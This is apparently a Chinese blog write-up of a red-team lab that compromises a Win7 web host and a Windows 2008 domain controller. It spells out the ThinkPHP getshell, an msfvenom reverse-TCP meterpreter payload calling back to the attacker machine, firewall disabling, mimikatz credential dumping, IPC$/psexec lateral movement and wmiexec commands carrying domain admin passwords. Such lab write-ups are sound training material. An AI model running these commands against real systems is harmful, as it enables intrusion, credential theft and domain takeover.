ATT&CK实战系列——红队实战(五)

ATT&CK实战系列——红队实战(五)

前言

前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。

靶场搭建

靶场下载地址:http://39.98.79.56/vuln/detail/7/

共有两台主机DC(WIN2008)、WIN7
Win7双网卡模拟内外网
主机密码

win7
sun\heart 123.com
sun\Administrator dc123.com

2008
sun\admin 2020.com
sun\Administrator Lza20001103
这里由于靶场时间太久了,密码被强制更新了,所以不知道又创建了一个Administrator权限的账号,也设置了密码,这导致后面的横向的时候,连接域控的时候出现了一些小差错,待会在跟大家详细说明一下了哈

网络配置

在这里插入图片描述
在这里插入图片描述
WIN7
在这里插入图片描述
192.168.138.136为内网网卡IP,192.168.135.150为外网网卡IP

kali攻击机应该和WIN7主机的外网网卡保持一致为NAT模式,且处于同一网段192.168.135.0/24
在这里插入图片描述
在这里插入图片描述
但是这样设置有个缺点,就是后面cs上线的时候,可能是因为网卡改变了,win7会跟主机不在同一个网段,导致不出网,所以连接不上,所以大家可以尝试以上的连接方式,也可以尝试以下我自己设置的NAT模式,可以与主机通网,对cs上线没有影响

在这里插入图片描述

ip是192.168.231.169
在这里插入图片描述
WIN2008在这里插入图片描述

测试网络连通
WIN7应该可以ping通kali和域控
kali:192.168.231.129
在这里插入图片描述
在这里插入图片描述
WIN7启动phpstudy在这里插入图片描述
靶场搭建完成

外网渗透

扫描端口开放情况,我们可以在kali中扫网段,看win7的ip地址是多少
nmap 192.168.231.1/24
在这里插入图片描述
发现开放了以下端口,说明打开了ipc连接
80,135,139,445,3306

打开80端口后,是一个网站
http://192.168.231.169:80在这里插入图片描述

其次,我们可以扫一下目录
python3 dirsearch.py -u “http://192.168.135.150”
在这里插入图片描述
在这里插入图片描述
发现也没有什么信息可以利用
打开robots.txt后,啥也没有
http://192.168.231.169/robots.txt
在这里插入图片描述

然后,我们回到正题,看到这个thinkphp框架,我们首先想到的是这个网站会不会有什么漏洞可以直接利用呢
我们直接上thinphp漏洞利用工具,看能否直接拿到shell了
java -jar thinkphp.jar
在这里插入图片描述
我们发现存在thinkphp5.0.22版本的漏洞,直接getshell,获得返回连接蚁剑的链接,还带有连接密码
http://192.168.231.169//peiqi.php Pass:peiqi

我们回到蚁剑直接连接
在这里插入图片描述

内网渗透

内网信息收集

我们拿到shell,下一步,我们需要干什么呢,这时需要进行内网的信息收集我们看看靶机是否存在域内,存在域的话,域名称是什么,域内还有其他主机存活吗,是否还有其他的网段,也就是内网的网段,是否有ipc链接,开启了共享连接,我们打开终端进行查看一下

发现存在另一台主机,也就是域控 DC
在这里插入图片描述

存在一个192.168.138.0/24的网段
在这里插入图片描述
域名为sun.com
在这里插入图片描述
说明存在域,我们就直接使用msf反弹shell,设置路由,进行访问内网的主机

msf反弹shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.231.129 lport=4445 -f exe -o test.exe
在这里插入图片描述
这里显示生成成功了
在这里插入图片描述
我们直接上传到蚁剑的目录中
在这里插入图片描述在这里插入图片描述
上传成功了,直接执行

我们在kali上设置参数,进行监听
set lhost 192.168.231.129
set lport 4445
set payload windows/x64/meterpreter/reverse_tcp
options
run

直接返回了一个会话了
在这里插入图片描述
我们先把防火墙关闭先
Netsh Advfirewall set allprofiles state off
在这里插入图片描述

设置路由

接下来我设置路由,查看路由
run autoroute -h
设置路由
run autoroute -s 192.168.138.0/24
查看状态
run autoroute -p
在这里插入图片描述

探测内网存活主机

run post/windows/gather/arp_scanner RHOSTS=192.168.138.0/24
在这里插入图片描述
发现存在ip为192.168.138.138地址,应该就是域控的ip了,在msf上由于无法使用mimikatz模块获取密码,无法进行下一步,我们只好利用cs上线来获取密码,进行横向渗透了

cs上线

我们分别打主机的cs客户端和kali的服务端
在这里插入图片描述

cs的目录,打开cs.bat
在这里插入图片描述

启动kali的cs服务端
进入到cs的目录,赋予执行脚本最大权限
chmod 777 teamserver
./teamserver 192.168.231.129 2000
在这里插入图片描述

就会出现以下的页面了
在这里插入图片描述

开始是没有以上的上线主机的,我是通过后面的木马生成以及横向移动完成这两台主机上线的,也就是最终的目标,拿下域控。

接下来我们先让win7上线,之前已经设置过监听器了,这里就不在设置了,我们直接生成一个后门,上传到蚁剑的目录中在这里插入图片描述
选择msf1的监听器
在这里插入图片描述
在这里插入图片描述

木马会生成在桌面上,我们只要上传到蚁剑中,就可以了
在这里插入图片描述

执行一下,我们就可以看到win7的管理员权限已经上线了,就是中间那个,我们拿到的还不是system权限,我们只有提高到system权限,才可以使使用提权模块,进行横向移动
在这里插入图片描述

我们利用提权模块进行提权
在这里插入图片描述
在这里插入图片描述

这个是用来提升为管理员权限的,因为已经是管理员权限,所以不用在提升了,我们换另外一个模块,是用来提升为system权限的
在这里插入图片描述
在这里插入图片描述
也就是最上面那个,已经成功提升为system权限了,接下来我们就需要进行横向移动了

横向移动

我们查看一下密码在这里插入图片描述
在这里插入图片描述
mimikatz抓取密码
Administrator
dc123.com

域控的修改后的密码(这是但是修改后的密码,还没有写入注册表里,所以抓取密码的时候还是老密码,导致密码登录错误),下面这个是正确的域控的密码
Administrator
Lza20001103

fscan扫描内网主机端口

接下来上传fscan到cs目录中,

在这里插入图片描述

shell fscan64.exe -h 192.168.138.0/24 -o 1.txt
在这里插入图片描述
在这里插入图片描述
可以看到通过fscan内网穿透扫描,查看到了域控的主机端口的开放情况,有以下端口开放
88,445,139,135

我们可以看到开放了139和445端口,就可以用于ipc连接,查看域控的C盘目录,同时可以做哈希传递攻击,psexec横向移动攻击

建立ipc连接
net use \192.168.138.138\ipc$ /user:Administrator “Lza20001103”

在kali的会话中输入shell,返回一个shell终端
shell
chcp 65001(将乱码转换为中文)
net use 查看ipc连接情况
在这里插入图片描述
发现已经有一个ipc连接了,我们查看一下DC的C盘目录
dir \192.168.138.138\c$在这里插入图片描述

我们拿到目录还不行,我们需要拿到域控的权限,就需要拿到他的会话,所以我们需要在cs上让域控进行上线

点击上面的星号标记
在这里插入图片描述

点击域控DC,右键Jump的psexec64模块
在这里插入图片描述

执行成功后,就返回了域控的会话了,且拿到的也是system权限

拿下域控

在这里插入图片描述
在这里插入图片描述

同时也开启了ipc连接
在这里插入图片描述
到这里,就成功拿下域控了。

这里给大家提供几个拿到域控权限的方法,因为这里开放了139.445端口,所以可以使用wmic进行连接
(使用WMIC连接远程主机,需要目标开启135和445端口。135端口是WMIC默认的管理端口,WMIC使用445端口传回显)成功连接域控主机,获取域控权限。后面如果想要连接远程桌面的话,可以开启3远程桌面服务,开启3389端口,关闭防火墙即可进行远程桌面登录)

方法一:
在kali中使用wmiexec.py脚本进行代理连接
proxychains python3 wmiexec.py sun/Administrator:Lza20001103@192.168.138.138

这里由于脚本下载有误,没有执行成功,就不上图了

方法二:
shell wmiexec.exe sun/Administrator:Lza20001103@192.168.138.138
好像也没有执行成功,没有回显出来

方法三:
shell cscript.exe //nologo C:\wmiexec.vbs /cmd 192.168.138.138 Administrator Lza20001103 “whoami”
这个执行成功了,但是只能回显某个命令,拿到的是域控的管理员权限
在这里插入图片描述
实验成功,也同样拿下了域控。

后记

红日靶场五到这里就结束了,这个靶场内网主机比较少,但也结合了外网和内网渗透的大部分的技能和知识,很适合刚入门的小白尝试一下噢,不过再多的内网主机也一样,只要拿到内网的主机权限,一步步进行横向渗透,就可以拿下整个网段的主机了,如果是多层网络,就可以采用内网的一台主机作为跳板机,一步一步进行渗透和内网穿透,就可以拿下多层网络的机器了,今天介绍到这里了,大家好好复习吧。

  • 5
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值